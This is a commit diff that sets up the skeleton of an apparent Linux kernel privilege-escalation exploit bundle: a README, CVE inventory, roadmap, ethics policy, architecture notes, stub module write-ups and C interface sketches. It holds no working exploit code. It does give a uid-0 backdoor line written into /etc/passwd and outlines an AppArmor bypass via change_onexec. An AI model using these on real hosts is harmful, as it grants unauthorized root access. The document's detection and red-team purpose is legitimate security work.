Initial skeleton: README, CVE inventory, roadmap, ARCH, ethics + copy_fail_family module absorbed from DIRTYFAIL

2026-05-16 19:26:24 -04:00
commit cf30b249de
45 changed files with 10336 additions and 0 deletions
@@ -0,0 +1,11 @@
build/
*.o
*.a
*.so
*.dSYM/
modules/*/build/
modules/*/dirtyfail
modules/*/iamroot
.vscode/
.idea/
*.swp
@@ -0,0 +1,58 @@
# CVE inventory
The curated list of CVEs IAMROOT exploits, with patch status and
module status. Updated as new modules land or as upstream patches
ship.
Status legend:
- 🟢 **WORKING** — module verified to land root on a vulnerable host
- 🟡 **PARTIAL** — module detects + exploits on some distros, not all
- 🔵 **DETECT-ONLY** — module fingerprints presence/absence but no
exploit (yet). Useful for blue teams.
- ⚪ **PLANNED** — stub exists, work not started
- 🔴 **DEPRECATED** — fully patched everywhere relevant; kept for
historical reference only
## Inventory
| CVE | Name | Class | First patched | IAMROOT module | Status | Notes |
|---|---|---|---|---|---|---|
| CVE-2026-31431 | Copy Fail (algif_aead `authencesn` page-cache write) | LPE (page-cache write → /etc/passwd) | mainline 2026-04-22 | `copy_fail_family/copy_fail` | 🟢 | Verified on Ubuntu 26.04, Alma 9, Debian 13. Full AppArmor bypass. |
| CVE-2026-43284 (v4) | Dirty Frag — IPv4 xfrm-ESP page-cache write | LPE (same primitive shape as Copy Fail, different trigger) | mainline 2026-05-XX | `copy_fail_family/dirty_frag_esp` | 🟢 | Full PoC + active-probe scan |
| CVE-2026-43284 (v6) | Dirty Frag — IPv6 xfrm-ESP (`esp6`) | LPE | mainline 2026-05-XX | `copy_fail_family/dirty_frag_esp6` | 🟢 | V6 STORE shift auto-calibrated per kernel build |
| CVE-2026-43500 | Dirty Frag — RxRPC page-cache write | LPE | mainline 2026-05-XX | `copy_fail_family/dirty_frag_rxrpc` | 🟢 | |
| (variant, no CVE) | Copy Fail GCM variant — xfrm-ESP `rfc4106(gcm(aes))` page-cache write | LPE | n/a | `copy_fail_family/copy_fail_gcm` | 🟢 | Sibling primitive, same fix |
| CVE-2022-0847 | Dirty Pipe — pipe `PIPE_BUF_FLAG_CAN_MERGE` write | LPE (arbitrary file write into page cache) | mainline 2022-02-23 | `_stubs/dirty_pipe_cve_2022_0847` | ⚪ | Stub. Public PoCs exist; bundling for completeness. Fixed in 5.16.11, 5.15.25, 5.10.102; earlier releases on those branches are affected |
| CVE-2023-0458 | EntryBleed — KPTI prefetchnta KASLR bypass | INFO-LEAK (kbase) | mainline (partial mitigations only) | `_stubs/entrybleed_cve_2023_0458` | ⚪ | Stub. Used as STAGE-1 leak brick, not a standalone LPE. Works on lts-6.12.88 (empirical 5/5). |
| CVE-2026-31402 | NFS replay-cache heap overflow | LPE (NFS server) | mainline 2026-04-03 | — | ⚪ | Candidate. Different audience (NFS servers) — TBD whether in-scope. |
| CVE-TBD | Fragnesia (ESP shared-frag in-place encrypt) | LPE (page-cache write) | mainline TBD | `_stubs/fragnesia_TBD` | ⚪ | Stub. Per `findings/audit_leak_write_modprobe_backups_2026-05-16.md`, requires CAP_NET_ADMIN in userns netns — may or may not be in-scope depending on target environment. |
## Pipeline for additions
1. Bug must be **patched in upstream mainline** (we don't bundle
0-days)
2. Either **CVE-assigned** or has clear advisory/patch reference
3. Affects a kernel version range with realistic deployment footprint
(we don't bundle exploits for kernels nobody runs)
4. PoC works on at least one distro+kernel in our CI matrix
5. Detection signature(s) shipped alongside the exploit
## Patch-status tracking
Each module's `kernel-range.json` (planned) declares the affected
range. CI verifies the exploit fails on the first-patched version
and succeeds below it. When a distro backports the fix into a kernel
version below the original first-patched, the matrix updates and
the relevant distro drops out of the "WORKING" list for that module.
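As an illustration of the range check described above, here is a minimal sketch in C. The `kver` and `kernel_range` types and their field names are hypothetical, since the `kernel-range.json` schema is still planned. The sketch assumes the upper bound is the first-patched release and is exclusive. A fix backported to several stable branches would need one entry per branch.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical types: the real kernel-range.json schema is not defined yet. */
struct kver { int major, minor, patch; };

struct kernel_range {
    struct kver introduced;     /* first affected release (inclusive) */
    struct kver first_patched;  /* first fixed release (exclusive) */
};

/* Three-way comparison of two versions: <0, 0, or >0. */
static int kver_cmp(struct kver a, struct kver b)
{
    if (a.major != b.major) return a.major < b.major ? -1 : 1;
    if (a.minor != b.minor) return a.minor < b.minor ? -1 : 1;
    if (a.patch != b.patch) return a.patch < b.patch ? -1 : 1;
    return 0;
}

/* True if v lies in [introduced, first_patched). */
static bool kver_in_range(struct kver v, const struct kernel_range *r)
{
    assert(r != NULL);
    return kver_cmp(v, r->introduced) >= 0 &&
           kver_cmp(v, r->first_patched) < 0;
}
```

With this shape, the CI expectation maps directly onto the bounds: the first-patched version itself falls outside the range, and anything below it (down to the introducing release) falls inside.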
## Why we exclude some things
- **0-days the maintainer found themselves**: those go through
responsible disclosure first, then enter IAMROOT after upstream patch
- **kCTF VRP submissions in flight**: same as above; disclosure
before bundling
- **Hardware-specific side channels** (Spectre/Meltdown variants):
out of scope; not page-cache or process-isolation primitives
- **Container-escape only**: unless it cleanly chains to host-root,
out of scope (separate tool space)
@@ -0,0 +1,35 @@
MIT License
Copyright (c) 2026 DIRTYFAIL contributors
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
---
DISCLAIMER FOR SECURITY RESEARCH SOFTWARE
This software is provided for authorized security research, education, and
defensive testing only. By using this software, you agree that:
1. You will only run the exploit modes (--exploit-*) on systems you own or
are explicitly authorized to test.
2. You understand that the exploit modes modify the kernel page cache copy
of /etc/passwd and that this is a privilege-escalation operation while
it persists. The on-disk file is not modified.
3. The authors disclaim all liability for any misuse of this software.
@@ -0,0 +1,26 @@
# IAMROOT top-level Makefile
#
# Phase 0 (current): defers to modules/copy_fail_family/Makefile.
# Phase 1: real dispatcher build that links all modules into one
# binary. See ROADMAP.md.
MODULES := copy_fail_family
.PHONY: all clean scan $(MODULES)
all: $(MODULES)
$(MODULES):
	$(MAKE) -C modules/$@
clean:
	@for m in $(MODULES); do \
		$(MAKE) -C modules/$$m clean; \
	done
	rm -rf build/
# Convenience: scan the host using the absorbed DIRTYFAIL-as-module
# until Phase 1's real dispatcher lands.
scan:
	@modules/copy_fail_family/dirtyfail --scan 2>/dev/null || \
		(echo "Build the copy_fail module first: make copy_fail_family" && exit 1)
@@ -0,0 +1,99 @@
# IAMROOT
> A curated, actively-maintained corpus of Linux kernel LPE exploits —
> bundled with their detection signatures, patch status, and version
> ranges. Run it on a system you own (or are authorized to test) and
> it tells you which historical and recent CVEs that system is still
> vulnerable to, and — with explicit confirmation — gets you root.
```
██╗ █████╗ ███╗ ███╗██████╗ ██████╗ ██████╗ ████████╗
██║██╔══██╗████╗ ████║██╔══██╗██╔═══██╗██╔═══██╗╚══██╔══╝
██║███████║██╔████╔██║██████╔╝██║ ██║██║ ██║ ██║
██║██╔══██║██║╚██╔╝██║██╔══██╗██║ ██║██║ ██║ ██║
██║██║ ██║██║ ╚═╝ ██║██║ ██║╚██████╔╝╚██████╔╝ ██║
╚═╝╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═╝
```
> ⚠️ **Authorized testing only.** IAMROOT is a research and red-team
> tool. By using it you assert you have explicit authorization to test
> the target system. See [`docs/ETHICS.md`](docs/ETHICS.md).
## What this is
Most Linux LPE references are dead repos, broken PoCs, or single-CVE
deep-dives. **IAMROOT is a living corpus**: each CVE that lands here
is empirically verified to work on the kernels it claims to target,
CI-tested across a distro matrix, and ships with the detection
signatures defenders need to spot it in their environment.
The same binary covers offense and defense:
- `iamroot --scan` — fingerprint the host, report which bundled CVEs
apply, and which are blocked by patches/config/LSM
- `iamroot --exploit <CVE>` — run the named exploit (with `--i-know`
authorization gate)
- `iamroot --detect-rules` — dump auditd / sigma / yara rules for
every bundled CVE so blue teams can drop them into their tooling
- `iamroot --mitigate` — apply temporary mitigations for CVEs the
host is vulnerable to (sysctl knobs, module blacklists, etc.)
## Status
**Active. Bootstrap phase as of 2026-05-16.** The first module
(`copy_fail_family`) was absorbed from the standalone DIRTYFAIL
project and is verified working end-to-end on Ubuntu 26.04, Alma 9,
and Debian 13, including full AppArmor bypass, a container escape
demo, and persistent backdoor mode.
See [`CVES.md`](CVES.md) for the full curated CVE list with patch
status. See [`ROADMAP.md`](ROADMAP.md) for the next planned modules.
## Why this exists
The Linux kernel privilege-escalation space is fragmented:
- **`linux-exploit-suggester` / `linpeas`**: suggest applicable
exploits, don't run them
- **`auto-root-exploit` / `kernelpop`**: bundle exploits, but largely
stale, no CI, no defensive signatures
- **Per-CVE single-PoC repos**: usually one author, often abandoned
within months of release, often only one distro
IAMROOT's bet is that there's room for a single curated bundle that
(1) actively maintains a small set of high-quality exploits across a
multi-distro matrix, and (2) ships detection rules alongside each
exploit so the same project serves both red and blue teams.
## Architecture
Each CVE (or tightly-related family) is a **module** under `modules/`.
Modules export a standard interface: `detect()`, `exploit()`,
`mitigate()`, `cleanup()`, plus metadata describing affected kernel
ranges, distro coverage, and CI test matrix.
Shared infrastructure (AppArmor bypass, su-exploitation primitives,
fingerprinting, common utilities) lives in `core/`.
See [`docs/ARCHITECTURE.md`](docs/ARCHITECTURE.md) for the
module-loader design and how to add a new CVE.
## Build & run
```bash
make # build all modules
sudo ./iamroot --scan # what's this box vulnerable to?
sudo ./iamroot --scan --json # machine-readable output for CI/SOC pipelines
sudo ./iamroot --detect-rules --format=sigma > rules.yml
sudo ./iamroot --exploit copy_fail --i-know # actually run an exploit
```
## Acknowledgments
Each module credits the original CVE reporter and PoC author in its
`NOTICE.md`. IAMROOT is the bundling and bookkeeping layer; the
research credit belongs to the people who found the bugs.
## License
MIT — see [`LICENSE`](LICENSE).
@@ -0,0 +1,111 @@
# Roadmap
What's coming next, in priority order. Dates are aspirational, not
commitments.
## Phase 0 — Bootstrap (DONE as of 2026-05-16)
- [x] Repo structure (modules/, core/, docs/, tools/, tests/)
- [x] Absorbed DIRTYFAIL as the first module
(`modules/copy_fail_family/`)
- [x] Top-level README, CVES.md, ROADMAP.md, docs/ARCHITECTURE.md,
docs/ETHICS.md
- [x] LICENSE (MIT)
- [x] Private GitHub repo
## Phase 1 — Make the bundling real (next session)
- [ ] Top-level `iamroot` dispatcher CLI (`iamroot.c`) — module
registry, fingerprint, route to module's detect/exploit
- [ ] Module interface header (`core/module.h`) — standard
`iamroot_module` struct each module exports
- [ ] Refactor `modules/copy_fail_family/` internals to expose the
standard module interface
- [ ] Extract shared code into `core/`: `apparmor_bypass.c`,
`exploit_su.c`, `common.c`, `fcrypt.c` (currently duplicated
under the absorbed DIRTYFAIL tree)
- [ ] Top-level `Makefile` that builds all modules into one binary
- [ ] Smoke test: `iamroot --scan --json` on Ubuntu 26.04
produces sensible output
## Phase 2 — Add Dirty Pipe (CVE-2022-0847)
Public PoC, well-understood, useful for completeness: IAMROOT
without Dirty Pipe is incomplete as a "historical bundle." The fix
landed in 5.16.11, 5.15.25, and 5.10.102, so coverage is older
deployments running earlier releases on those branches (worth
bundling, since many production boxes still run these).
- [ ] `modules/dirty_pipe_cve_2022_0847/` — exploit + detect + range
metadata
- [ ] Test matrix: Ubuntu 20.04 (vulnerable kernels), Debian 11
(vulnerable kernels), modern kernels (immune — should detect
as patched)
- [ ] Detection rules: auditd splice/pipe write patterns
## Phase 3 — Add EntryBleed (CVE-2023-0458) as stage-1 leak brick
EntryBleed is **not a standalone LPE**. It's a **kbase leak
primitive** that other modules can chain. Bundle it because:
- Stage-1 of any future "build-your-own LPE" workflow
- Detection rules for KPTI side-channel attempts are useful for
defenders
- Already works empirically on lts-6.12.88 (verified 2026-05-16)
- [ ] `modules/entrybleed_cve_2023_0458/` — leak primitive +
detect-mitigations
- [ ] Exposed as a library helper: other modules can call
`entrybleed_leak_kbase()` when they need a kbase
## Phase 4 — CI matrix
- [ ] Distro+kernel VM matrix in GitHub Actions (Ubuntu 20.04 /
22.04 / 24.04 / 26.04, Debian 11 / 12 / 13, Alma 8 / 9 / 10,
Fedora 39 / 40 / 41)
- [ ] Each module's exploit runs against matched-vulnerable VMs and
MUST land root; runs against patched VMs and MUST fail at
detect step
- [ ] Nightly run; failures open issues automatically
## Phase 5 — Detection signature export
- [ ] `iamroot --detect-rules --format=sigma` — Sigma rules per CVE
- [ ] `--format=yara` — YARA rules for static detection of exploit
binaries
- [ ] `--format=auditd` — auditd `.rules` snippets
- [ ] `--format=falco` — Falco rule snippets
- [ ] Sample SOC playbook in `docs/DETECTION_PLAYBOOK.md`
## Phase 6 — Mitigation mode
- [ ] `iamroot --mitigate` walks the host's vulnerabilities, applies
temporary sysctl / module-blacklist / LSM workarounds
- [ ] Per-CVE rollback procedure if the mitigation breaks something
- [ ] Idempotent: running twice is safe
## Phase 7+ — More modules
Backfill of historical and recent LPEs as time allows:
- [ ] **CVE-2021-3493** — overlayfs nested-userns LPE
- [ ] **CVE-2021-4034** — Pwnkit (pkexec env handling)
- [ ] **CVE-2022-2588** — net/sched route4 dead UAF
- [ ] **CVE-2023-2008** — vmwgfx OOB write
- [ ] **CVE-2024-1086** — netfilter nf_tables UAF
- [ ] Fragnesia (if it lands as a CVE)
- [ ] Anything we ourselves disclose — bundled AFTER upstream patch
ships (responsible-disclosure-first)
## Non-goals
- **No 0-day shipment.** Everything in IAMROOT is post-patch.
- **No automated mass-targeting.** No host-list mode. No automatic
pivoting.
- **No persistence beyond `--exploit-backdoor`'s
`/etc/passwd` overwrite**, which is overt and easily detected by
any auditd rule we ship ourselves. Persistence-as-evasion is out
of scope.
- **No container-runtime escapes** unless they cleanly chain to
host-root.
- **No Windows / macOS / non-Linux targets.** Focus is the moat.
@@ -0,0 +1,119 @@
# Architecture
## Module model
Each CVE (or tightly-related family of CVEs sharing a primitive) is
a **module** under `modules/`. A module is a self-contained
exploit + detection + metadata bundle that exports a standard
interface to the top-level dispatcher.
### Module layout
```
modules/<module_name>/
├── MODULE.md # Human-readable writeup of the bug
├── NOTICE.md # Credits to original researcher
├── kernel-range.json # Machine-readable affected kernels
├── module.c # Implements iamroot_module interface
├── module.h
├── detect/
│ ├── auditd.rules # blue team detection
│ ├── sigma.yml
│ └── yara.yara
├── src/ # exploit internals
└── tests/ # per-module tests (run in CI matrix)
```
### `iamroot_module` interface (planned, Phase 1)
```c
#include <stddef.h>   /* size_t */

/* Forward declarations so the function-pointer signatures below
 * compile on their own; the definitions live elsewhere (planned). */
struct iamroot_host;
struct iamroot_opts;
struct iamroot_kernel_range;

struct iamroot_module {
    const char *name;     /* "copy_fail" */
    const char *cve;      /* "CVE-2026-31431" */
    const char *summary;  /* one-line description */

    /* Return 1 if host appears vulnerable, 0 if patched/immune,
     * -1 if probe couldn't run. May call entrybleed_leak_kbase()
     * etc. from core/ if a leak primitive is needed. */
    int (*detect)(struct iamroot_host *host);

    /* Run the exploit. Caller has already passed the
     * authorization gate. Returns 0 on root acquired,
     * nonzero on failure. */
    int (*exploit)(struct iamroot_host *host, struct iamroot_opts *opts);

    /* Apply a runtime mitigation for this CVE (sysctl, module
     * blacklist, etc.). Returns 0 on success. NULL if no
     * mitigation is offered. */
    int (*mitigate)(struct iamroot_host *host);

    /* Undo --exploit-backdoor or --mitigate side effects. */
    int (*cleanup)(struct iamroot_host *host);

    /* Affected kernel version range, distros covered, etc. */
    const struct iamroot_kernel_range *ranges;
    size_t n_ranges;
};
```
Modules register themselves at program startup, before `main()`
runs, via constructor-attribute functions that add each module to a
registry table. The top-level `iamroot` binary iterates the registry
on each invocation.
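A minimal sketch of constructor-based registration, assuming GCC or Clang (`__attribute__((constructor))` is a compiler extension, not standard C). The `demo_module` struct, `demo_register()`, `demo_find()`, and the fixed-size table are hypothetical stand-ins; the real `iamroot_module` registry is still planned and may look different.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

#define MAX_MODULES 64

/* Reduced stand-in for struct iamroot_module: only the fields used here. */
struct demo_module {
    const char *name;
    const char *cve;
};

/* Zero-initialized static storage, so it is valid before any
 * constructor runs. */
static const struct demo_module *registry[MAX_MODULES];
static size_t registry_len;

/* Append a module to the registry. */
void demo_register(const struct demo_module *m)
{
    assert(m != NULL && registry_len < MAX_MODULES);
    registry[registry_len++] = m;
}

/* Look a module up by name; returns NULL if it is not registered. */
const struct demo_module *demo_find(const char *name)
{
    for (size_t i = 0; i < registry_len; i++)
        if (strcmp(registry[i]->name, name) == 0)
            return registry[i];
    return NULL;
}

/* Each module's translation unit would carry a pair like this. */
static const struct demo_module copy_fail_mod = {
    .name = "copy_fail",
    .cve  = "CVE-2026-31431",
};

/* Runs automatically before main(). */
__attribute__((constructor))
static void copy_fail_register(void)
{
    demo_register(&copy_fail_mod);
}
```

The appeal of this pattern is that adding a module means adding an object file to the link, with no central list to edit. The trade-off is that constructor order across translation units is unspecified, so the dispatcher should not depend on registry order.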
## Shared `core/`
Code that more than one module needs lives in `core/`:
- `core/common.c` — fingerprinting (kernel version, distro, LSM,
hardening flags), logging, error handling
- `core/apparmor_bypass.c` — Ubuntu's
`apparmor_restrict_unprivileged_userns=1` defeat via
`change_onexec("crun")` re-exec
- `core/exploit_su.c` — once we have page-cache-write or
/etc/passwd-overwrite, this is the shared "drop to root shell"
helper
- `core/fcrypt.c` — rxkad fcrypt cipher helpers (S-box tables, key schedule; see the module's `NOTICE.md`) used by multiple modules
- `core/entrybleed.c` (planned, Phase 3) — kbase leak primitive that
any module needing KASLR-defeat can call
## Top-level dispatcher
`iamroot.c` (planned, Phase 1) is the CLI entry point. Responsibilities:
1. Parse args (`--scan`, `--exploit <name>`, `--mitigate`,
`--detect-rules`, `--cleanup`, etc.)
2. Fingerprint the host
3. For `--scan`: iterate module registry, call each module's
`detect()`, emit table of results
4. For `--exploit <name>`: locate module, gate behind `--i-know`,
call its `exploit()`
5. For `--detect-rules`: walk module registry, concatenate detection
files in the requested format
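The argument-parsing and authorization-gate steps above can be sketched with `getopt_long`. This is an illustration only: the `cli` struct, the `cli_mode` enum, and `cli_parse()` are hypothetical names, and only a subset of the flags is handled. No module code is invoked here.

```c
#include <assert.h>
#include <getopt.h>
#include <stdbool.h>
#include <stddef.h>

enum cli_mode { MODE_NONE, MODE_SCAN, MODE_EXPLOIT, MODE_DETECT_RULES };

struct cli {
    enum cli_mode mode;
    const char *target;  /* module name given to --exploit */
    bool i_know;         /* authorization gate flag */
};

/* Returns 0 on success, -1 on bad usage or a missing --i-know. */
int cli_parse(int argc, char **argv, struct cli *out)
{
    static const struct option opts[] = {
        { "scan",         no_argument,       NULL, 's' },
        { "exploit",      required_argument, NULL, 'e' },
        { "detect-rules", no_argument,       NULL, 'd' },
        { "i-know",       no_argument,       NULL, 'k' },
        { NULL, 0, NULL, 0 },
    };
    int c;

    assert(out != NULL);
    *out = (struct cli){ .mode = MODE_NONE };
    optind = 1;  /* restart scanning so the function can be called again */
    opterr = 0;  /* suppress getopt's own error messages */

    while ((c = getopt_long(argc, argv, "", opts, NULL)) != -1) {
        switch (c) {
        case 's': out->mode = MODE_SCAN; break;
        case 'e': out->mode = MODE_EXPLOIT; out->target = optarg; break;
        case 'd': out->mode = MODE_DETECT_RULES; break;
        case 'k': out->i_know = true; break;
        default:  return -1;  /* unknown option or missing argument */
        }
    }
    if (out->mode == MODE_NONE)
        return -1;
    /* Refuse to route to exploit() unless the gate flag is present. */
    if (out->mode == MODE_EXPLOIT && !out->i_know)
        return -1;
    return 0;
}
```

Enforcing the gate inside the parser means no later code path can reach a module's `exploit()` with the flag absent.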
## CI matrix
`.github/workflows/ci.yml` (planned, Phase 4) runs each module's
test against a matrix of distro × kernel VMs. Each test asserts:
- on a vulnerable VM: `detect()` returns 1, `exploit()` returns 0
and produces uid=0
- on a patched VM: `detect()` returns 0, `exploit()` either refuses
or fails gracefully
Failures on a previously-working matrix entry open an issue
automatically (likely cause: distro shipped a backport that broke
the module).
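The per-VM assertions above reduce to a small predicate over the two return codes. The sketch below uses a hypothetical helper name, `ci_expectation_met()`, and follows the return-code conventions of the planned `iamroot_module` interface. It does not cover the separate uid=0 check, which a real test would perform on the VM.

```c
#include <assert.h>
#include <stdbool.h>

/* detect():  1 = vulnerable, 0 = patched/immune, -1 = probe could not run.
 * exploit(): 0 = root acquired, nonzero = failure or refusal. */
bool ci_expectation_met(bool vm_is_vulnerable, int detect_rc, int exploit_rc)
{
    assert(detect_rc >= -1 && detect_rc <= 1);
    if (vm_is_vulnerable)
        return detect_rc == 1 && exploit_rc == 0;
    /* Patched VM: detect must say "patched" and exploit must not succeed. */
    return detect_rc == 0 && exploit_rc != 0;
}
```

Note that a probe that could not run (`-1`) fails the expectation on both kinds of VM, which seems the safer default for a nightly matrix.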
## Adding a new CVE
1. `git checkout -b add-cve-XXXX-NNNN`
2. `cp -r modules/_stubs/_template modules/<module_name>`
3. Fill in `MODULE.md`, `NOTICE.md`, `kernel-range.json`
4. Implement `module.c` exposing the `iamroot_module` interface
5. Ship at least one detection rule under `detect/`
6. Add tests under `tests/`
7. PR. CI runs the matrix. If it lands root on at least one
vulnerable matched VM AND fails cleanly on a patched VM, it
merges.
See `docs/module-template.md` (planned) for the per-module checklist.
@@ -0,0 +1,75 @@
# Ethics, scope, and acceptable use
## Acceptable use
IAMROOT is intended for:
1. **Authorized red-team / pentest engagements.** You have a written
scope, signed by someone who can authorize testing on the target
systems.
2. **Defensive teams testing detection coverage.** You're using
IAMROOT in a lab to verify your auditd/sigma/falco rules fire as
expected.
3. **Security researchers studying historical LPEs.** You're reading
the code, running it in your own VMs, learning how the primitives
actually work end-to-end.
4. **Build engineers verifying patch coverage.** You're running
`iamroot --scan` against your fleet's golden images to confirm
each known CVE shows up as patched.
## Not-acceptable use
IAMROOT should not be used:
1. On systems you do not own and have not been authorized to test
2. As part of unauthorized access to any system
3. To exfiltrate data or maintain persistence on a system after a
testing engagement is complete
4. To build a worm, scanner, or any tool that automatically targets
systems at scale without per-target authorization
By using IAMROOT you assert that your use falls into the
acceptable-use cases above.
## Why this is publishable
Every CVE bundled in IAMROOT is:
- **Already patched** in upstream mainline kernel
- **Already published** in NVD or distro security trackers
- **Already covered** by existing public PoCs
IAMROOT does not introduce new offensive capability. It bundles,
documents, and CI-tests what is already public — and ships the
detection signatures defenders need to spot it.
The bundling itself does not lower the baseline competence required
to misuse this code: a script kiddie can already find and run
single-CVE PoCs on GitHub. Bundling improves quality and CI coverage
without meaningfully changing offensive capability, while providing
real defensive value through the detection-rule exports.
## Disclosure
If you find a bug in IAMROOT itself (incorrect detection, broken
exploit on a kernel where it should work, missing a backport in the
range metadata): file a public GitHub issue.
If you find a **new 0-day kernel LPE while inspired by reading
IAMROOT code**: please disclose it responsibly to the kernel
security team (`security@kernel.org`) and the affected distros
*before* writing a public PoC. Once upstream patch ships and a CVE
is assigned, IAMROOT will gladly accept the module.
## Persistence and stealth are out of scope
`--exploit-backdoor` in the copy_fail module overwrites a
`/etc/passwd` line with a `uid=0` shell account. This is **overt**:
- The username is `iamroot` (was `dirtyfail`) — instantly identifiable
- It's covered by the auditd rules IAMROOT ships
- `--cleanup-backdoor` restores the original line
If you're looking for evasion, persistence, or stealth: not here.
Use a real C2 framework if you have authorization to do so. IAMROOT
stops at "demonstrate that the bug works."
@@ -0,0 +1,47 @@
# Dirty Pipe — CVE-2022-0847
> ⚪ **PLANNED** module. See [`../../ROADMAP.md`](../../ROADMAP.md)
> Phase 2.
## Summary
The `flags` field of a newly allocated `pipe_buffer` was left
uninitialized in the `copy_page_to_iter_pipe()` and `push_pipe()`
paths, so a stale `PIPE_BUF_FLAG_CAN_MERGE` could carry over and let
an unprivileged user write into the page cache of any file readable
by them.
## Affected kernels
- 5.16.x before 5.16.11
- 5.15.x LTS before 5.15.25
- 5.10.x LTS before 5.10.102
## Upstream patch
`9d2231c5d74e13b2a0546fee6737ee4446017903` ("lib/iov_iter: initialize
"flags" in new pipe_buffer")
## Why this module is here
Even in 2026, many production deployments still run vulnerable
kernels (RHEL 7/8, older Ubuntu LTS, embedded). Bundling Dirty Pipe
makes IAMROOT useful as a "historical sweep" tool on long-tail
systems.
## Implementation plan
- C exploit ported from public PoCs (credit upstream authors in
`NOTICE.md` when implemented)
- `detect()`: kernel version check + `/proc/version` parse + test
for fixed-version backports
- `exploit()`: writes `iamroot::0:0:dirtypipe:/:/bin/bash` into
`/etc/passwd`, then `su iamroot` — same shape as copy_fail's
backdoor mode
- Detection rules: auditd on splice() calls + pipe write patterns,
filesystem audit on `/etc/passwd` modification by non-root
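The version-check part of the planned `detect()` could look roughly like the sketch below. It assumes the upstream fix first shipped in 5.16.11, 5.15.25, and 5.10.102 and that the bug was introduced in 5.8. The function names are hypothetical. A bare version comparison cannot see distro backports (a release string such as `5.15.0-91-generic` always parses with patch level 0), so this would only be the first stage before a backport test.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdio.h>

/* Parse "5.15.0-91-generic" style release strings (e.g. from uname -r).
 * Returns false if no major.minor prefix was found; a missing patch
 * level is treated as 0. */
bool parse_release(const char *rel, int *maj, int *min, int *patch)
{
    assert(rel && maj && min && patch);
    *patch = 0;
    return sscanf(rel, "%d.%d.%d", maj, min, patch) >= 2;
}

/* 1 = upstream version is in the affected range, 0 = outside it.
 * Says nothing about distro backports. */
int dirty_pipe_version_check(int maj, int min, int patch)
{
    if (maj != 5 || min < 8)
        return 0;                 /* older than 5.8, or 6.x and later */
    if (min == 10) return patch < 102;
    if (min == 15) return patch < 25;
    if (min == 16) return patch < 11;
    /* Assumption: other 5.8..5.14 branches were already end-of-life
     * and did not receive the upstream fix; 5.17+ shipped with it. */
    return min < 16;
}
```

A caller would typically feed `parse_release()` the `release` field from `uname(2)` and treat a `1` result as "possibly vulnerable, confirm with a backport check".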
## Not started yet
Pick this up after Phase 1 (module-interface refactor of the
copy_fail family) so this module can use the standard
`iamroot_module` shape from the start.
@@ -0,0 +1,56 @@
# EntryBleed — CVE-2023-0458
> ⚪ **PLANNED** stub module. See [`../../ROADMAP.md`](../../ROADMAP.md)
> Phase 3.
## Summary
KPTI's user-space-mapped entry trampoline is detectable via
`prefetchnta` timing, leaking the kernel base address (defeats
KASLR). Universal across modern x86_64 kernels with KPTI; only
partial mitigations have shipped upstream.
## Why this is here
EntryBleed is **not a standalone LPE**. It's a **stage-1 leak
primitive** that future LPE modules can call when they need a kbase.
Bundling it as a module:
1. Lets other modules `#include "core/entrybleed.h"` and call
`entrybleed_leak_kbase()` when they need KASLR defeat
2. Ships defensive detection rules for prefetchnta-timing-attack
patterns (useful for hardened environments)
3. Documents the technique with a clear writeup so users
understand what "stage-1" means in the broader chain
## Empirical status on recent kernels
Verified 2026-05-16: works 5/5 on lts-6.12.88 (no anti-EntryBleed
mitigation configured). See
`security-research/findings/audit_io_uring_2026-05-16_poc_attempt.md`
and the EntryBleed test code at
`SKYFALL/bugs/leak_write_modprobe_2026-05-16/exploit.c` lines ~73-150.
## Upstream patches
There is no single canonical patch. Partial mitigations include:
- `CONFIG_RANDOMIZE_KSTACK_OFFSET` (per-syscall kernel stack jitter)
- Some KPTI hardening discussions on lkml, no merged fix as of
lts-6.12.88
- The community position remains that "KASLR is best-effort,
not a security boundary"
## Implementation plan
- Lift the proven EntryBleed code from
`SKYFALL/bugs/leak_write_modprobe_2026-05-16/exploit.c` into
`module.c` here
- Expose as both a CLI mode (`iamroot --leak-kbase`) and as a
library helper (`uint64_t entrybleed_leak_kbase(void)`)
- Detection rules: timing-attack pattern flags, perf-counter
anomaly detection (informational — these are hard to make precise
without false positives)
## Not started yet
Phase 3.
@@ -0,0 +1,27 @@
# Fragnesia — CVE pending
> ⚪ **PLANNED** stub. See [`../../ROADMAP.md`](../../ROADMAP.md)
> Phase 7+.
## Summary
ESP shared-frag in-place encrypt path can be coerced into writing
into the page cache of an unrelated file. Same primitive shape as
Dirty Frag, different reach.
## Status
Audit-stage. See
`security-research/findings/audit_leak_write_modprobe_backups_2026-05-16.md`
section on backup primitives. Notably: trigger appears to require
CAP_NET_ADMIN inside a userns netns. On kCTF (shared net_ns) that's
cap-dead, but on host systems where user_ns clone is enabled it's
reachable.
## Decision needed before implementing
Is the unprivileged-userns-netns scenario in scope for IAMROOT? If
yes, this module ships. If we restrict to "default Linux user
account, no namespace tricks," this module is out of scope.
## Not started.
@@ -0,0 +1,93 @@
# DIRTYFAIL — Makefile
#
# Builds a single binary `dirtyfail` from src/*.c (dynamically linked
# by default; use `make static` for a static build).
#
# Targets:
#   make          build optimized binary
#   make debug    build with -O0 -g3 for gdb
#   make static   build a fully static binary (musl recommended for portability)
#   make clean    remove build artifacts
#   make scan     build and run --scan against localhost
#
# Build prerequisites: gcc or clang, make, libc headers including
# <linux/xfrm.h>. On Debian/Ubuntu: `apt install build-essential linux-libc-dev`.
# On RHEL/Fedora: `dnf install gcc make kernel-headers`.
CC ?= gcc
